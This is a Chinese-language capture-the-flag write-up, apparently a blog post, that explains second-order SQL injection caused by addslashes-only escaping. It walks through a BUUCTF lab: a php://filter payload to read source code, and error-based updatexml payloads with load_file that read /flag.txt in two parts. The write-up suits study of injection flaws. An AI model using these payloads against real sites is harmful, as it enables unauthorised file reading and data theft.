SQL注入之二次注入

二次注入

二次注入漏洞是一种在 Web 应用程序中广泛存在的安全漏洞形式。相对于一次注入漏洞而言，工次注入漏洞更难以被发现，但是它却具有与一次注入攻击漏洞相同的攻击威力。（二次注入多为字符型注入）
二次注入原理
 二次注入的原理，在第一次进行数据库插入数据的时候，仅仅只是使用了addslashes, 或者是借助 get magic_quotes_gpc 对其中的特殊字符进行了转义,但是 addslashes,有一个特点就是虽然参数在过滤后会添加“\”进行转义,但是“\”并不会插入到数据库中，在写入数据库的时候还是保留了原来的数据。在将数据存入到了数据库中之后，开发者就认为数据是可信的。在下一次进行需要进行查询的时候，直接从数据库中取出了脏数据，没有进行下一步的检验和处理，这样就会造成 SQL的二次注入。比如在第一次插入数据的时候，数据中带有单引号，直接插入到了数据库中;然后在下一次使用中在拼凑的过程中，就形成了二次注入.

插入恶意数据库->引用恶意数据（潜伏）

在测试中，应先确定网站是否有过滤（一般都有）然后寻找注入点，一般邮箱，注册，修改密码，文章添加，编辑出现概率大

此次靶机来自buuctf

查看源代码后发现有file参数

在url中输入：?file=php://filter/read=convert.base64-encode/resource=index.php

导出为base64编码并解码获得源代码（感谢csdn）

此网页有index，confirm，delete，change网页，逻辑是index.php->confirm.php

经过筛查，发现change.php存在注入（无转义函数）

if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){

        $msg = 'no sql inject!';

    }else{

        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";

        $fetch = $db->query($sql);

    }

开始注入

使用报错注入

1'and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#

之后修改订单读取flag

1'and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,30)),0x7e),1)#

重新注入获得后半段